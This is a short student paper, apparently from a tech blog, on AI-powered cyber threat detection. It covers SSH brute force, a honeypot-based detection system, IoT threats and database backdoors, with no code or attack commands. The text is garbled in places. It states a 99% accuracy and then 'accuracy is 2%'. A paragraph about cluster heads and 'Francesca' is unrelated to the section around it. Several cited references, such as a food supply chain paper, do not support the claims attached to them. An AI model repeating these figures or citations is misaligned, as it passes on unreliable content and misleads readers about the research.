By: Dadapeer Agraharam Shaik , Department of Computer Science and Technology, Student of Computer Science and technology, Madanapalle Institute of Technology and Science, Angallu,517325, Andhra Pradesh.
————————————————————————————
Abstract: Thus, modern computer environment requires elaborated protection as the threats grow in quantity and complexity with the help of information technologies. AI threat detection has been realised as a revolutionary solution that utilizes artificial intelligence to improve the protective mechanisms in cybersecurity. This paper identifies and discusses the factors of threat detection through employing the use of AI and technologies such as machine learning, behavioural analysis, and real-time data processing techniques. With the feature of imitation learning from large chunks of data, AI frameworks are competent to trace signs of cyber threats and respond actively and resourcefully. It must be noted that the incorporation of Artificial Intelligence in cybersecurity does more than enhance the speed and precision of threat detection alongside handling an increasing shortage of cybersecurity professionals. The paper also considers positive and negative aspects of the threat detection through AI and its prospects, considering the method to be highly effective in safeguarding confidential data and preserving the structural integrity of pertinent networks.
Keyword’s: Ai-Powered ,Threat Detection , Cyber Security.
1.INTRODUCTION
The Internet of Things (IoT) is integrated in many fields due to the high popularity of the devices that connect to the Internet every day. As at 2021, IoT devices’ installations across the global market sum up to 35 billion. Volume of data which is increasing and the ease of having remotes for these gadgets makes them vulnerable to cyber predators. The majority of IoT devices are based on Linux, and, given that they are often controlled over the net via Telnet or SSH, they have password-based security. However, the hackers are well aware of such remote connections and they are using brute force attack to compromise the systems, get into any system and walk away with the sensitive information of any organization they wish. SSH protocol is used in connection with the requirement for a distant connection; the client and the server’s communication is generally encrypted; the attacker can misuse this characteristic for unauthorized action.
Some examples of SSH threats are the data leakage of the Sony Picture Hack in the year 2014 for which SSH keys were stolen and the Kaiji malware that conducted brute force attacks on ignorant SSH services in the year 2020. These incidences bring into perspective the importance of SSH security and especially control of users’ access and remote commands.
This paper presents the use of artificial intelligence to approach the issue of detecting such commands and constructing the AI@NTDS network threat detection system. The system employs a Command Dataset which is gathered by Honeypot and sorted out into different classifications. As the main objective, the identification of hacker intent is highlighted with 52 features comprising of message-based, host-based, and geographic characteristics for AI assessment.
With reference to the contributions made by the AI@NTDS system, it is possible to assert that the described model is a three-level threat detection framework that has an amazing accuracy of 99%. Specifically, the accuracy is 2%, and the F1-score is 99. 8%. From the feature importance analysis, it can be seen that Message Length, Execution File, and Received Size are important for the system’s ability to detect malicious behaviour thus making the system highly effective in screening out threats relating to the remote networking connection and The below Fig.1shows the Architecture of AI-Powered Threads [1].
Fig.1 Architecture of AI-Powered Threads
2.Threat Model
Smart devices are known to have fairly low levels of security and are easily prone to hacks, even simple ones. Additionally, due to the heterogeneous IoT devices and mostly resource constraint in the IoT devices, it becomes impossible to protect the IoT infrastructures using normal network security solutions. Such an assumption, which implies that the linked devices are implicitly safe, is not valid when it comes to IoT gadgets as it is fairly easy to compromise insecure IoT devices to launch attacks on the other devices that are connected to the network. This section provides a brief overview of some of the ever present threats in the IoT networks.
A. Botnets
A Botnet , which is a group of hijacked computer devices is utilized for various cybercrimes and cons. The bots are applied for extended coordinated attack in relation to data plunder, server crash, and malware spreading. Botnets use your gadgets for other purposes such as defrauding people or creating havoc when you are not aware. It is also a Botnet attack specifically used to infiltrate network devices[2].
B. Denial of Service
In DoS, an attacker attacks to deny personal devices (computer, phone, smartwatch, etc. ) for an intended user to perform the usual activities. The mechanism of the DoS attack is to flood the targeted machine with extra request that yields no real result until the actual request cannot be handled. The DoS attack comes from one source; however, if the same attack is executed through several different sources, it is called DDoS attack.
C. Man in the Middle
MitM used to intercept the conversations of the user devices over the network for replay and injection attacks. An MiTM attacker can simply eavesdrop on traffic initiated by a user’s smartphone to turn off the house security system unjustifiably.
D. Reconnaissance
Reconnaissance attack is another type of attack that collects data about the specific subject. The collected information can be further used to, offence aims of some distinct attack to gain unauthorized access to some device or a network. These assaults can be on intellectual level and or involve physical force. They comprise packet sniffing, ping sweeping and port scanning, phishing and social engineering, as well as Internet information searches [3].
Model for Detecting and Mitigating Backdoor Attacks on Database Servers
This study aims at DB backdoor attack where the attacker asks for a malevolent programs to be loaded in the target database with a motive of corrupting data and creating havoc in the End user networks. A new term used in the context is different SQL query’s that is used to extend into the network[4]. New findings in the area of computer security have revealed this threat. With the intention of covering tracks, to gain the level of unauthorized access to a system, attackers exploit the pervious weakness of an authenticating and networking construct. Another type of attack that takes use of the backdoors includes making use of the system flaws or query flaws. This paves way for complete and utter doom. From topographical perspective, the findings of the research indicate that ensemble machine learning should be placed in such a way that it lies in between the internet connection and the database in order to counter the mentioned hazards.[5] The authentication is mandatory in order to prevent the malicious node from being the CH of the corresponding cluster. This means that this cluster is under safe operation as confirmed by Francesca. In second module, all the sensors’ use symmetric encryption and protect their data before passing it on to the CH. It is then processed in a secure manner and sent to the base station for compilation. In the same manner, to maintain secure network operations any compromised data is managed according to the time stamp values.[6]
Conclusion:
That is why artificial intelligence-based threat identification can be considered as the important evolution step in the field of security. Thus, AI increases the capacity of detecting and combating cyber threats with great efficiency due to the use of machine learning algorithms, behavioural analysis, and real-time data processing. It adapts itself to arrays of big data and figures out probabilities and predispose that suggest threats so as to enable preventive and dynamic countermeasures to be taken. The use of AI in security doubles the protection against threats while cutting down the involvement of people in security, due to the increased skill deficit in the cyber workforce. Thus, alongside the growth of AI technologies, AI’s application will become even more critical in providing stronger protection of digital structures from constantly emerging cyber threats.
Reference:
- B.-X. Wang, J.-L. Chen, and C.-L. Yu, “An AI-Powered Network Threat Detection System,” IEEE Access, vol. 10, pp. 54029–54037, 2022, doi: 10.1109/ACCESS.2022.3175886.
- M. Rahaman, F. Tabassum, V. Arya, and R. Bansal, “Secure and sustainable food processing supply chain framework based on Hyperledger Fabric technology,” Cyber Secur. Appl., vol. 2, p. 100045, Jan. 2024, doi: 10.1016/j.csa.2024.100045.
- I. Bibi, A. Akhunzada, and N. Kumar, “Deep AI-Powered Cyber Threat Analysis in IIoT,” IEEE Internet Things J., vol. 10, no. 9, pp. 7749–7760, May 2023, doi: 10.1109/JIOT.2022.3229722.
- L. Triyono, R. Gernowo, P. Prayitno, M. Rahaman, and T. R. Yudantoro, “Fake News Detection in Indonesian Popular News Portal Using Machine Learning For Visual Impairment,” JOIV Int. J. Inform. Vis., vol. 7, no. 3, pp. 726–732, Sep. 2023, doi: 10.30630/joiv.7.3.1243.
- A. Khan and I. Sharma, “AI-Powered Detection and Mitigation of Backdoor Attacks on Databases Server,” in 2024 2nd International Conference on Intelligent Data Communication Technologies and Internet of Things (IDCIoT), Jan. 2024, pp. 374–379. doi: 10.1109/IDCIoT59759.2024.10467487.
- N. Goyal, M. Dave, and A. K. Verma, “SAPDA: Secure Authentication with Protected Data Aggregation Scheme for Improving QoS in Scalable and Survivable UWSNs,” Wirel. Pers. Commun., vol. 113, no. 1, pp. 1–15, Jul. 2020, doi: 10.1007/s11277-020-07175-8.
- Mishra, P., Jain, T., Aggarwal, P., Paul, G., Gupta, B. B., Attar, R. W., & Gaurav, A. (2024). CloudIntellMal: An advanced cloud based intelligent malware detection framework to analyze android applications. Computers and Electrical Engineering, 119, 109483.
- Bai, S., Shi, S., Han, C., Yang, M., Gupta, B. B., & Arya, V. (2024). Prioritizing user requirements for digital products using explainable artificial intelligence: A data-driven analysis on video conferencing apps. Future Generation Computer Systems, 158, 167-182.
Cite As
Shaik D. A. (2024) AI-Powered Threat Detection: How It Works, Insights2Techinfo, pp.1